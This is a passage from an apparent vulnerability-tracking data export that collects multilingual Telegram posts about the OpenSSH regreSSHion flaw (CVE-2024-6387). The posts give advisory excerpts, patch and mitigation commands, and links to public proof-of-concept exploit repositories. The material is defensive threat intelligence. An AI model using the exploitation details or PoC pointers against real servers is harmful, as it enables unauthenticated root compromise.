\u067e\u0627\u06cc\u0627\u0646 \u067e\u0627\u0633\u062e\u200c\u062f\u0647\u06cc \u0627\u0631\u0633\u0627\u0644 \u0645\u06cc\u200c\u0634\u0648\u062f \u06a9\u0647 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0627\u0642\u062f\u0627\u0645\u0627\u062a \u062e\u0648\u062f\u06a9\u0627\u0631 \u0628\u06cc\u0634\u062a\u0631\u06cc \u0627\u0646\u062c\u0627\u0645 \u062f\u0647\u062f\u060c \u0645\u0627\u0646\u0646\u062f \u0645\u062d\u062f\u0648\u062f \u06a9\u0631\u062f\u0646 \u062f\u0633\u062a\u0631\u0633\u06cc \u06cc\u0627 \u0634\u0631\u0648\u0639 \u062a\u062d\u0642\u06cc\u0642\u0627\u062a \u0628\u06cc\u0634\u062a\u0631.", "creation_timestamp": "2024-07-02T11:43:16.000000Z"}, {"uuid": "aa1b166f-3b55-40fc-8889-e1a2bfa03069", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/13317", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-6387\n\ud83d\udd25 CVSS Score: 8.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A security regression (CVE-2006-5051) was discovered in OpenSSH's server (sshd). There is a race condition which can lead sshd to handle some signals in an unsafe manner. An unauthenticated, remote attacker may be able to trigger it by failing to authenticate within a set time period.\n\ud83d\udccf Published: 2024-07-01T12:37:25.431Z\n\ud83d\udccf Modified: 2025-04-24T18:35:27.934Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:4312\n2. https://access.redhat.com/errata/RHSA-2024:4340\n3. https://access.redhat.com/errata/RHSA-2024:4389\n4. https://access.redhat.com/errata/RHSA-2024:4469\n5. https://access.redhat.com/errata/RHSA-2024:4474\n6. https://access.redhat.com/errata/RHSA-2024:4479\n7. https://access.redhat.com/errata/RHSA-2024:4484\n8. https://access.redhat.com/security/cve/CVE-2024-6387\n9. https://bugzilla.redhat.com/show_bug.cgi?id=2294604\n10. https://santandersecurityresearch.github.io/blog/sshing_the_masses.html\n11. https://www.openssh.com/txt/release-9.8\n12. https://www.qualys.com/2024/07/01/cve-2024-6387/regresshion.txt", "creation_timestamp": "2025-04-24T19:06:47.000000Z"}, {"uuid": "d1c4837a-dd15-4111-9d29-dc43f046de59", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://t.me/GithubRedTeam/8311", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aPHP CGI Argument Injection (CVE-2024-4577) RCE\nURL\uff1ahttps://github.com/almogopp/OpenSSH-CVE-2024-6387-Fix\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-08-20T10:00:56.000000Z"}, {"uuid": "e0d5a377-e32b-4687-b07d-82d23bfaaa72", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "exploited", "source": "https://t.me/YAH_Channel/1013", "content": "\u041d\u043e\u0432\u044b\u0439 \u0441\u0442\u0430\u0440\u044b\u0439 \u0431\u044d\u043d\u0433\u0435\u0440 \u043f\u043e\u0434\u044a\u0435\u0445\u0430\u043b. \u0420\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u044e \u0442\u0449\u0430\u0442\u0435\u043b\u044c\u043d\u0435\u0435 \u043f\u0440\u0438\u0441\u043c\u043e\u0442\u0440\u0435\u0442\u044c\u0441\u044f \u043a \u0441\u0432\u043e\u0438\u043c ssh \u043e\u0442\u0432\u0435\u0440\u0441\u0442\u0438\u044f\u043c \u0432 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0435.\n\nRace condition \u043f\u0440\u0438\u0432\u043e\u0434\u044f\u0449\u0438\u0439 \u043a RCE \u0432 openSSH.\n\n\u041a\u043e\u043b\u043b\u0435\u0433\u0438 \u043f\u0438\u0448\u0443\u0442, \u0447\u0442\u043e \u0430\u043a\u0442\u0438\u0432\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u043b\u0438\u0441\u044c \u0431\u043e\u0442\u043d\u0435\u0442\u044b \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0449\u0438\u0435 \u044d\u0442\u043e\u0442 \u0431\u0430\u0433. Be careful \ud83d\ude09 \n\n\u0421\u0441\u044b\u043b\u043a\u0430:\nhttps://www.kaspersky.ru/blog/openssh-vulnerability-mitigation-cve-2024-6387-regresshion/37793/", "creation_timestamp": "2025-10-28T06:45:31.000000Z"}, {"uuid": "79aed533-bbd2-4960-8c98-973d436600f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/nwnotes/105", "content": "CVE-2024-6387 - regreSSHion: Remote Unauthenticated Code Execution Vulnerability in OpenSSH server\n\nDebian Security\n\u0417\u0430\u0440\u0435\u043f\u043e\u0440\u0442\u0438\u043b\u0438 Qualyz Threat Research Unit, \u043d\u043e\u0432\u043e\u0441\u0442\u044c \u043e\u0442 \u043d\u0438\u0445\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 openssh server, \u0437\u0430\u043d\u0435\u0441\u0451\u043d\u043d\u0430\u044f \u043a\u043e\u043c\u043c\u0438\u0442\u043e\u043c, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0440\u0435\u0444\u0430\u043a\u0442\u043e\u0440\u0438\u043b \u0441\u0438\u0441\u0442\u0435\u043c\u0443 \u043b\u043e\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f. \u041f\u043e\u0434 \u0443\u0433\u0440\u043e\u0437\u043e\u0439 \u0432\u0435\u0440\u0441\u0438\u0438, \u043d\u0430\u0447\u0438\u043d\u0430\u044f \u0441 8.5.p1 \u0438\u0441\u043a\u043b\u044e\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0434\u043e 9.8p1 (\u0432\u044b\u0448\u043b\u0430 7 \u0447\u0430\u0441\u043e\u0432 \u043d\u0430\u0437\u0430\u0434) .\n\n\u041f\u0440\u043e\u0432\u0435\u0440\u0438\u0442\u044c, \u043a\u0430\u043a\u0430\u044f \u0443 \u0432\u0430\u0441 \u0441\u0435\u0439\u0447\u0430\u0441 \u0432\u0435\u0440\u0441\u0438\u044f: sshd -V\n\u041e\u043f\u0440\u0435\u0434\u0435\u043b\u0438\u0442\u044c \u0432\u0435\u0440\u0441\u0438\u044e \u0432\u0430\u0448\u0435\u0433\u043e \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e\u0433\u043e \u0441\u0435\u0440\u0432\u0435\u0440\u0430: nc ip-or-domain 22\n\nSecurity-\u043f\u0430\u0442\u0447\u0438 \u0443\u0436\u0435 \u0435\u0441\u0442\u044c \u0432 \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u044f\u0445 Ubuntu \u0438 Debian:\napt update\nsudo apt install --upgrade openssh-server openssh-client\n\n\u041a\u0430\u043a \u043f\u0440\u043e\u043f\u0430\u0442\u0447\u0438\u0442\u044c\u0441\u044f \u0438\u0437 \u0441\u043e\u0440\u0441\u043e\u0432 (\u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0439\u0442\u0435 \u0442\u043e\u043b\u044c\u043a\u043e \u0432 \u0441\u043b\u0443\u0447\u0430\u0435, \u0435\u0441\u043b\u0438 \u0432\u044b \u0437\u043d\u0430\u0435\u0442\u0435, \u0447\u0442\u043e \u0434\u043e \u0432\u0430\u0441 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u043d\u0435 \u0434\u043e\u043b\u0435\u0442\u0438\u0442, \u0442\u0430\u043a \u043a\u0430\u043a \u0441\u043f\u043e\u0441\u043e\u0431 \u043d\u0430\u0440\u0443\u0448\u0430\u0435\u0442 \u043f\u0440\u0438\u043d\u0446\u0438\u043f \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u043f\u0430\u043a\u0435\u0442\u0430\u043c\u0438): \n\u041d\u0430 \u0432\u0441\u044f\u043a\u0438\u0439 \u0441\u043b\u0443\u0447\u0430\u0439 \u0441\u0434\u0435\u043b\u0430\u043b \u0438\u043d\u0441\u0442\u0440\u0443\u043a\u0446\u0438\u044e \u043f\u043e \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0435 9.8p1 \u043d\u0430 Debian-based (Debian, Ubuntu, Mint, ...):\n\napt-get update\napt-get install build-essential zlib1g-dev libssl-dev libpam0g-dev libselinux1-dev\nwget https://github.com/openssh/openssh-portable/archive/refs/tags/V_9_8_P1.tar.gz\ntar -xzf V_9_8_P1.tar.gz\ncd openssh-portable-V_9_8_P1\n./configure\nmake\nmake install\nmv /usr/sbin/sshd /usr/sbin/sshd.bak\nln -s /usr/local/sbin/sshd /usr/sbin/sshd\nmkdir -p /usr/local/etc && for file in /etc/ssh/*; do [ -f \"$file\" ] && ln -s \"$file\" /usr/local/etc/; done\nsystemctl restart sshd\n\n\n\u2014\u2014\u2014\n\u0421\u0435\u0439\u0447\u0430\u0441 \u0433\u0443\u043b\u044f\u0435\u0442 \u0430\u0440\u0445\u0438\u0432 \u0441 poc \u043e\u0442 7etsuo, \u043e\u043d \u043b\u0435\u0436\u0430\u043b \u0437\u0434\u0435\u0441\u044c: https://github.com/7etsuo/cve-2024-6387-poc/ - \u043d\u043e \u0441\u0435\u0439\u0447\u0430\u0441 \u0442\u0443\u0442 404. \u041e\u0434\u0438\u043d \u0438\u0437 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0445 \u043a\u043e\u043c\u043c\u0438\u0442\u043e\u0432 \u0433\u043b\u0430\u0441\u0438\u043b, \u0447\u0442\u043e \"poc \u043d\u0435\u0440\u0430\u0431\u043e\u0447\u0438\u0439, \u043d\u043e \u0434\u043b\u044f \u043d\u0430\u0447\u0430\u043b\u0430 \u0441\u043e\u0439\u0434\u0451\u0442\"\n\n\u0412 \u0441\u0442\u0430\u0442\u044c\u0435 Qualyz Threat Research Unit \u0435\u0441\u0442\u044c \u0441\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0435 \u0434\u0435\u0442\u0430\u043b\u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u043d\u0435 \u0437\u0430\u0442\u044f\u0433\u0438\u0432\u0430\u0439\u0442\u0435 \u0441 \u0430\u043f\u0434\u0435\u0439\u0442\u043e\u043c.", "creation_timestamp": "2024-07-01T17:34:36.000000Z"}, {"uuid": "b9535a75-c3e7-4704-822b-f44544d08b68", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://t.me/tech_b0lt_Genona/4551", "content": "> but OpenBSD is notably not vulnerable\n\n\u0421\u043b\u0430\u0432\u0430 \u041f\u0430\u0442\u0440\u0438\u043a\u0443 \u0422\u0435\u043e\n\nThis regression was introduced in October 2020 (OpenSSH 8.5p1) by commit\n752250c (\"revised log infrastructure for OpenSSH\"), which accidentally\nremoved an \"#ifdef DO_LOG_SAFE_IN_SIGHAND\" from sigdie(), a function\nthat is directly called by sshd's SIGALRM handler. In other words:\n\n- OpenSSH < 4.4p1 is vulnerable to this signal handler race condition,\n  if not backport-patched against CVE-2006-5051, or not patched against\n  CVE-2008-4109, which was an incorrect fix for CVE-2006-5051;\n\n- 4.4p1 <= OpenSSH < 8.5p1 is not vulnerable to this signal handler race\n  condition (because the \"#ifdef DO_LOG_SAFE_IN_SIGHAND\" that was added\n  to sigdie() by the patch for CVE-2006-5051 transformed this unsafe\n  function into a safe _exit(1) call);\n\n- 8.5p1 <= OpenSSH < 9.8p1 is vulnerable again to this signal handler\n  race condition (because the \"#ifdef DO_LOG_SAFE_IN_SIGHAND\" was\n  accidentally removed from sigdie()).\n\nThis vulnerability is exploitable remotely on glibc-based Linux systems,\nwhere syslog() itself calls async-signal-unsafe functions (for example,\nmalloc() and free()): an unauthenticated remote code execution as root,\nbecause it affects sshd's privileged code, which is not sandboxed and\nruns with full privileges. We have not investigated any other libc or\noperating system; but OpenBSD is notably not vulnerable, because its\nSIGALRM handler calls syslog_r(), an async-signal-safer version of\nsyslog() that was invented by OpenBSD in 2001.\n\nregreSSHion: RCE in OpenSSH's server, on glibc-based Linux systems\n(CVE-2024-6387)\nhttps://www.qualys.com/2024/07/01/cve-2024-6387/regresshion.txt", "creation_timestamp": "2024-07-01T10:01:49.000000Z"}, {"uuid": "cd91714f-af1a-47d6-9a1e-aba8e46bee61", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/tech_b0lt_Genona/4552", "content": "PoC \u043f\u043e\u0434\u044a\u0435\u0445\u0430\u043b \u0434\u043b\u044f CVE-2024-6387\n\na signal handler race condition in OpenSSH's server (sshd)\nhttps://github.com/7etsuo/cve-2024-6387-poc\n\n\u0417\u0430 \u0441\u0441\u044b\u043b\u043a\u0443 \u0441\u043f\u0430\u0441\u0438\u0431\u043e \u043f\u043e\u0434\u043f\u0438\u0441\u0447\u0438\u043a\u0443\n\nUPD: \u0440\u0435\u043f\u0443 \u0443\u0434\u0430\u043b\u0438\u043b\u0438, \u0430\u0440\u0445\u0438\u0432 \u0432 \u043a\u043e\u043c\u043c\u0435\u043d\u0442\u0430\u0445", "creation_timestamp": "2024-07-01T12:22:03.000000Z"}, {"uuid": "8618c682-a54b-4a3c-8519-c649b5745744", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://t.me/ddos_guard/476", "content": "\u200b\u041a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 OpenSSH: \u0447\u0442\u043e \u043d\u0443\u0436\u043d\u043e \u0437\u043d\u0430\u0442\u044c \u0438 \u043a\u0430\u043a \u0437\u0430\u0449\u0438\u0442\u0438\u0442\u044c\u0441\u044f\n\n\u041a\u043e\u043c\u043f\u0430\u043d\u0438\u044f Qualys \u0432\u044b\u044f\u0432\u0438\u043b\u0430 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c (CVE-2024-6387) \u0432 OpenSSH, \u043f\u043e\u043b\u0443\u0447\u0438\u0432\u0448\u0443\u044e \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 regreSSHion. \u042d\u0442\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u0435 \u043a\u043e\u0434 \u0441 \u043f\u0440\u0430\u0432\u0430\u043c\u0438 root \u0431\u0435\u0437 \u043f\u0440\u043e\u0445\u043e\u0436\u0434\u0435\u043d\u0438\u044f \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438. \u0414\u043b\u044f \u0443\u0441\u043f\u0435\u0448\u043d\u043e\u0439 \u0430\u0442\u0430\u043a\u0438 \u0442\u0440\u0435\u0431\u0443\u0435\u0442\u0441\u044f \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u043c\u043d\u043e\u0436\u0435\u0441\u0442\u0432\u043e \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u0439 \u0441 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u043c, \u0447\u0442\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043d\u0430\u0440\u0443\u0448\u0438\u0442\u044c \u0440\u0430\u0431\u043e\u0442\u0443 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0438 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043f\u043e\u043b\u043d\u044b\u0439 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044c.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u0440\u043e\u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f, \u043d\u0430\u0447\u0438\u043d\u0430\u044f \u0441 \u0432\u0435\u0440\u0441\u0438\u0438 OpenSSH 8.5 \u043d\u0430 \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445 \u0441 Glibc. \u0411\u043e\u043b\u0435\u0435 \u0432\u044b\u0441\u043e\u043a\u0430 \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e\u0441\u0442\u044c \u0443\u0441\u043f\u0435\u0448\u043d\u043e\u0439 \u0430\u0442\u0430\u043a\u0438 \u043d\u0430 32-\u0440\u0430\u0437\u0440\u044f\u0434\u043d\u044b\u0435 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0438 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0431\u0435\u0437 \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u043d\u043e\u0439 \u0437\u0430\u0449\u0438\u0442\u044b ASLR.\n\n\u041a\u0430\u043a\u0438\u0435 \u0440\u0438\u0441\u043a\u0438 \u043f\u043e\u044f\u0432\u043b\u044f\u044e\u0442\u0441\u044f \u0432 \u0441\u0432\u044f\u0437\u0438 \u0441 \u044d\u0442\u0438\u043c\n\n\ud83d\udc49 \u0412\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430 \u0441 \u043f\u0440\u0430\u0432\u0430\u043c\u0438 root \u0438 \u043f\u0435\u0440\u0435\u0445\u0432\u0430\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c\u0438 \u043f\u043e\u043b\u043d\u043e\u0433\u043e \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044f \u043d\u0430\u0434 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u043c\n\ud83d\udc49 \u041f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u0430\u044f \u0443\u0442\u0435\u0447\u043a\u0430 \u0434\u0430\u043d\u043d\u044b\u0445, \u043c\u043e\u0434\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u044f \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0439, \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0430 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u041f\u041e\n\ud83d\udc49 \u041a\u043e\u0440\u044b\u0441\u0442\u043d\u043e\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0440\u0435\u0441\u0443\u0440\u0441\u043e\u0432 \u0441\u0435\u0440\u0432\u0435\u0440\u0430, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440 \u043c\u0430\u0439\u043d\u0438\u043d\u0433\n\n\u041a\u0430\u043a \u043e\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u0438\u0442\u044c \u0441\u0432\u043e\u0439 \u0441\u0435\u0440\u0432\u0435\u0440\n\n1\ufe0f\u20e3 \u041e\u0431\u043d\u043e\u0432\u0438\u0442\u0435 OpenSSH: \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0439\u0442\u0435\u0441\u044c \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0435\u0439 \u0432\u0435\u0440\u0441\u0438\u0435\u0439 OpenSSH 9.8, \u0432 \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u0434\u0430\u043d\u043d\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0430\n2\ufe0f\u20e3 \u0421\u043b\u0435\u0434\u0438\u0442\u0435 \u0437\u0430 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f\u043c\u0438: \u0440\u0435\u0433\u0443\u043b\u044f\u0440\u043d\u043e \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0439\u0442\u0435 \u043d\u0430\u043b\u0438\u0447\u0438\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0439 \u0434\u043b\u044f \u0432\u0430\u0448\u0435\u0433\u043e \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u0430 (Debian, Ubuntu, RHEL, SUSE/openSUSE, Fedora \u0438 \u0434\u0440.)\n3\ufe0f\u20e3 \u041e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0439\u0442\u0435 \u043b\u043e\u0433\u0438: \u043e\u0431\u0440\u0430\u0449\u0430\u0439\u0442\u0435 \u0432\u043d\u0438\u043c\u0430\u043d\u0438\u0435 \u043d\u0430 \u043f\u043e\u044f\u0432\u043b\u0435\u043d\u0438\u0435 \u0437\u0430\u043f\u0438\u0441\u0435\u0439 \"Timeout before authentication\" \u0432 \u043b\u043e\u0433\u0430\u0445, \u0447\u0442\u043e \u043c\u043e\u0436\u0435\u0442 \u0441\u0432\u0438\u0434\u0435\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u043e\u0432\u0430\u0442\u044c \u043e \u043f\u043e\u043f\u044b\u0442\u043a\u0430\u0445 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438\n\u0411\u0443\u0434\u044c\u0442\u0435 \u0431\u0434\u0438\u0442\u0435\u043b\u044c\u043d\u044b \u0438 \u043d\u0435 \u043e\u0442\u043a\u043b\u0430\u0434\u044b\u0432\u0430\u0439\u0442\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u0441\u0438\u0441\u0442\u0435\u043c, \u0447\u0442\u043e\u0431\u044b \u043c\u0438\u043d\u0438\u043c\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0440\u0438\u0441\u043a\u0438 \u0438 \u0437\u0430\u0449\u0438\u0442\u0438\u0442\u044c \u0441\u0432\u043e\u0438 \u0434\u0430\u043d\u043d\u044b\u0435.", "creation_timestamp": "2024-07-11T11:28:53.000000Z"}, {"uuid": "ec97d43c-f8c5-4421-8aca-9a813fcc0c09", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/dl_konserva/10", "content": "\u26a1 \u041d\u0435\u0434\u0430\u0432\u043d\u043e \u0441\u0442\u0430\u043b\u043e \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e \u043e\u0431 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 SSH \u0441 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440\u043e\u043c CVE-2024-6387, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u0442\u044c \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u043c\u0443 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043a\u043e\u0434\u0430 \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u0435.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u044b\u0435 \u0432\u0435\u0440\u0441\u0438\u0438:\n\u2022 OpenSSH < 4.4p1\n\u2022 8.5p1 <= OpenSSH < 9.8p1.\n\n\u0414\u043b\u044f \u044d\u0442\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0443\u0436\u0435 \u0435\u0441\u0442\u044c PoC:\nhttps://github.com/acrono/cve-2024-6387-poc. \n\n\u041a\u0430\u043a \u0443\u0437\u043d\u0430\u0442\u044c \u0432\u0435\u0440\u0441\u0438\u044e?\n\ndpkg -l | grep ssh\n\n\u041a\u0430\u043a \u043c\u043e\u0436\u043d\u043e \u043f\u043e\u0444\u0438\u043a\u0441\u0438\u0442\u044c \u0434\u0430\u043d\u043d\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c?\n\n\u0412\u0430\u0440\u0438\u0430\u043d\u0442 1 - \u041e\u0431\u043d\u043e\u0432\u0438\u0442\u044c\u0441\u044f:\n\n\napt update\napt install -y build-essential zlib1g-dev libssl-dev\nwget https://cdn.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-9.8p1.tar.gz\ntar -xzf openssh-9.8p1.tar.gz\ncd openssh-9.8p1/\n./configure --prefix=/ --exec_prefix=/usr --sysconfdir=/etc/ssh\nmake\nmake install\nservice sshd restart\n\n\n\u0412\u0430\u0440\u0438\u0430\u043d\u0442 2 - \u0415\u0441\u043b\u0438 \u043f\u043e \u043a\u0430\u043a\u0438\u043c-\u0442\u043e \u043f\u0440\u0438\u0447\u0438\u043d\u0430\u043c \u0443 \u0432\u0430\u0441 \u043d\u0435 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u0441\u044f \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u044c\u0441\u044f, \u0442\u043e \u043c\u043e\u0436\u043d\u043e \u0445\u043e\u0442\u044f \u0431\u044b \u043d\u0435 \u0434\u043e\u043f\u0443\u0441\u0442\u0438\u0442\u044c RCE:\n\n\u0414\u043b\u044f \u044d\u0442\u043e\u0433\u043e \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u0432 \u0444\u0430\u0439\u043b\u0435 sshd_config \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435 LoginGraceTime \u0440\u0430\u0432\u043d\u043e\u0435 0.\n\u0423 \u044d\u0442\u043e\u0433\u043e \u043c\u0435\u0442\u043e\u0434\u0430 \u0435\u0441\u0442\u044c \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043e\u043a:\n\n\nFinally, if sshd cannot be updated or recompiled, this signal handler\nrace condition can be fixed by simply setting LoginGraceTime to 0 in the\nconfiguration file. This makes sshd vulnerable to a denial of service\n(the exhaustion of all MaxStartups connections), but it makes it safe\nfrom the remote code execution presented in this advisory.", "creation_timestamp": "2024-08-27T15:30:48.000000Z"}, {"uuid": "240c8ad9-1bbd-4a6b-97b2-d761bc070872", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "Telegram/8h8Hof7StAZ6aRznwRxa4merJrUBQ8lRPVMkNJUc9vM2lk4", "content": "", "creation_timestamp": "2025-09-09T03:00:06.000000Z"}, {"uuid": "7064a4e4-322d-465d-99d9-2dfe8e5fe065", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://t.me/habr_com_news/29062", "content": "1 \u0438\u044e\u043b\u044f 2024 \u0433\u043e\u0434\u0430 \u0441\u043e\u0441\u0442\u043e\u044f\u043b\u0441\u044f \u0440\u0435\u043b\u0438\u0437 \u043e\u0442\u043a\u0440\u044b\u0442\u043e\u0439 